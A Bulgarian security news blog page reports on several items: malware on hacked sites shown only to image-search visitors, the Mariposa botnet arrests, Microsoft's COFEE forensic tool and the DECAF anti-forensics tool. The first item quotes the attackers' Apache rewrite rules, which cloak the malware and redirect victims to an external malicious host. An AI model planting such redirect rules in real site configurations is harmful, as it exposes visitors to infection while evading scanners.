Често задавани въпроси

Интересен зловреден код се е появил по няколко от хакнатите Интернет сайтове. Хакването на сайт и вграждането на зловреден код, който заразява посетителите не е нищо ново, но в случая зловредния код се изпраща само ако страницата е отворена от фрейма на Google Image Search. Едно подобно ограничение може и да намалява значително броя на хората, които ще бъдат заразени първоначално, но пък е доста ефективен начин за криене от всичките сканиращи за вируси и гадове паяци ( вкл. Google  Safebrowsing ). В конкретният случай дори е посочен начина на постигане на ефекта – прост HTTP Rewrite:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

Изтече секретен документ от 22 страници, подробно описващ каква информация съхранява Microsoft за всички потребители на онлайн услугите си ( поща, Live ID, Live Spaces, Messenger, Xbox Live, SkyDrive & Office Live Workspace )  и как тази информация може да бъде получена от трибуквените агенции.

Трима бот-пастири са арестувани в Испания заради ботнета “Марипоса” ( Пеперуда на испански ). Първите следи на ботнета се появиха към декември 2008-ма и бързо достигна размер от 12.7 млн заразени компютъра, според данните на АП. Основно ботнета е бил използван за разпращане на спам и фалшив антивирусен софтуер, като са засегнати близо половината от Fortune 1000 компаниите и повече от 40 големи банки. От пролетта на 2009-та ФБР работи заедно с Панда Секюрити, които са базирани в Билбао, Испания. Благодарение на съдействието на няколко Интернет доставчика. За отбелязване е, че в подобен род разследвания много рядко се арестуват реалните бот-пастири. В конкретния случай полицията е коментирала, че тримата, известни само с никнеймовете си “netkairo” на 31 години,  “jonyloleante” на 30 и  “ostiator”  на 25, не са купували луксозни стоки и спортни коли, нито са се отличавали с особена интелигентност. По-скоро са имали сериозни връзки с организираната престъпност, които са им помогнали за изграждането на “Марипоса”. Нивото на комплексност на ботнета е изключително високо и е твърде вероятно самата разработка да не е дело на тримата, а да са използвани опитни разработчици.
Линк към оригиналната публикация

Разбира се в този случай става въпрос за Microsoft Computer Online Forensic Evidence Extractor (COFEE) инструмента, който бе разработен по молба на няколко от трибуквените агенции в САЩ. COFEE се предоставя безплатно на полицейските служби в цял свят ( чрез Интерпол ) и служи за извличане на информация от компютрите, анализирани като веществени доказателства ( computer forensics ). Според публикуваните прес-релийзи използването му изисква минимални компютърни познания, което е добра новина за повечето полицейски експерти – с негова помощ може да се прехване още при първоначалният оглед информация, която би се загубила при евентуално изключване на компютъра и пренасянето му за изследване в лаборатория ( нали сте гледали CSI ? E, няма нищо общо ). В общи линии, единственото, което се иска е, да се включи USB флаш памет към компютъра и оттам нататък автоматично се стартират предварително настроени тестове и скриптове за колекциониране на данни.
Разработен през 2008-ма, с помоща на бивш Хонг-Конгски полицай, дълго време въпросния инструмент или по-скоро набор инструменти имаше широка слава в хакерските общества, основно поради факта, че беше недостъпен за широката публика и съответно не беше преминал през анализа, на който обикновенно се подлагат инструментите за информационна сигурност или анализ на доказателства.
В последствие през ноември 2009-та най-накрая COFEE изтече в публичното пространство и както обикновенно – резултатите са разочароващи – повечето прилежащи инструменти са инсталирани в Windows още от времето на Win 2000. В последствие Microsoft леко промениха начина, по който описват COFEE – вече е инструмент за ускоряване работата на експертите, който позволява анализа да се извърши за 20 минути, а не за обичайните 3-4 часа. Всъщност представлява обвивка, стартираща стандартните at, autorunsc, getmac, handle, hostname, ipconfig,
msinfo32, nbstat, net, netdom, netstat, openfiles, psfile, pslist,
psloggedon, psservice, pstat, psuptime, quser, route, sc, sclist,
showgrps, systeminfo, tasklist, whoami.
В следствие на теча се появи инструмента DECAF или Detect and Eliminate Computer Assisted Forensics, който цели именно блокиране на работата на  COFEE. За отбелязване е, че този инструмент само възпрепятства точно изпълнението на MS продукта ( триене на лога на COFEE, размонтиране на USB устройствата и генериране на фалшиви MAC адреси ), без да унищожава или да влияе по някакъв начин на същинските данни – те са безпрепятствено достъпни, ако използвате друг похват за анализ. В последствие групата, разработила DECAF се опита да го използва за повече или по-малко политически цели. DECAF беше деактивиран отдалечено, като в последствие групата SОLDIERX успя да разработи пач за реактивация.
Както COFEE, така и DECAF са достъпни от thepiratebay.org, като специално за първият ще ви трябва компютър с Windows XP за първоначална инсталация и стандартна флаш памет, с размер поне 1 Gb.

Алтернативи на COFEE, и то доста мощни могат да са специализираната за forensic дистрибуция Helix или Windows Forensic Toolchest. Всъщност дори и любимият ми Backtrack има вграден инструментариум за поне 90% от функционалността на COFEE. Разбира се ,всички тези инструменти изискват рестарт на системата, но в общия случай, ако системата има FireWire порт, то той може да се използва за пълен дъмп на паметта ( това не е бъг, фийчър е ).

Днес се натъкнах на приятен Nmap 5 Cheat Sheet на английски. Можете да си го свалите от тук (packetstormsecurity.org).